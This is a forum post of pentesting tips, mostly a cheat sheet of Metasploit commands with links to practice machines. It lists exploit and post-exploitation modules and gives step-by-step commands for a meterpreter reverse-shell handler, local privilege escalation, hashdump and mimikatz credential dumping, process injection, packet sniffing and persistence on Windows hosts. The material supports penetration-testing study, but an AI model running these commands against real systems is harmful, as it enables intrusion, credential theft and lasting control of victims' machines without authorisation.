Tips / Commands / Hacking

Hello:grinning:, good to everyone I leave some of the commands and tips I have collected throughout my studies and pentesting certifications, everything can be useful.The post is probably not very organized, I’m sorry for that but it can serve you many things for your pentesting.

If you would like to learn hacking and pentesting I recommend some machines that are very complete and serve to practice many different techniques are: Nebula and Protostar

Nebula: https://www.vulnhub.com/entry/exploit-exercises-nebula-v5,31/

Nebula: It takes a look at + SUID files + Permissions + Race conditions + Shell meta-variables + $PATH weaknesses + Scripting language weaknesses + Binary compilation failures At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.

Protostar: https://old.liveoverflow.com/binary_hacking/protostar/index.html

Dradis-Framework(Create Reporte One-Click): https://dradisframework.com/ce/

Some of the modules of metasploit

exploit/multi/samba/usermap_script
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/admin/mysql/mysql_sql
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/postgres/postgres_hashdump
exploit/linux/postgres/postgres_payload
auxiliary/scanner/http/tomcat_mgr_login
exploit/multi/http/tomcat_mgr_deploy

help -meterpreters
background - Then interact with a session
sessions s-i 2 (Identifier)
meterpreter > load -l
meterpreter > load sniffer
migrate PID -> to migrate the process through the PID

Post explotation
basically means the phases of operation once a victim’s system has been compromised by the attacker.
If we already have a compromised machine and we want to see all the modules of post exploitation, only with type post / windows + enter we can see the modules that metasploit offers us

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently, meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp’ used on all others.

post/multi/manage/shell_to_meterpreter


post/windows/gather/enum_logged_on_users(view logged users)
post/windows/gather/checkvm (check if it is a virtual machine)
post/windows/gather/forensics/browser_history
post/windows/gather/lsa_secrets
post/windows/gather/win_privs (scale privileges)

If we need a reverse shell from metasploit we can use multi handler, for example, suppose we already have the machine compromised but we do not have a reverse shell, we follow these steps

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.99.243(ip example)
set LPORT 4444
exploit -j (sending PID to Background)
jobs(we will be what are the processes that are running in the background)
jobs -h(help)

server in python(2.7)

python -m SimpleHTTPServer 8000

server in python(3.x)

python -m http.server 8000

Local Exploit
Some of the methodologies when we have gained access to a machine and we have a user with low privileges and of course we want to get root. Suppose we have an exploit to launch and we escalate privileges

use exploit/windows/local/ms15_051_client_copy_image

we have got privileges and be NT / AUTHORITY-SYSTEM

We can see all user hashes by typing hashdump.

meterpreter>hashdump

also if we have a local exploit and we launch it for example a bypass of uac, it is probably exploitable in windows7 without patching

use exploit/windows/local/bypassuac
load -l (the list of services we can upload)
set session 5 (connect to session number 5)
getsystem(we can test if we get root automatically)
load_sniffer(we load a sniffer)
sniffer_start 1
sniffer_dump 1

you could investigate more about sniffer its other options that it has
Do not forget that while you load more services in the process the meterpreter’s memory grows, a good option is to migrate to another process also in case of losing the session for example:

migrate PID

You can also use this module of metasploit to inject the meterpreter in all the processes that can be:

use post/windows/manage/multi_meterpreter_inject

If we want to dump the victim’s ram

load_winpem()

mimikatz

load_mimikatz
wdigest
load_kiwi

Persistence

use post/Windows/manage/persistence_exe
set Session x
info
set REXEPATH C:

I hope something is helpful, thanks

9 Likes

Thank you for this! Very helpful!

1 Like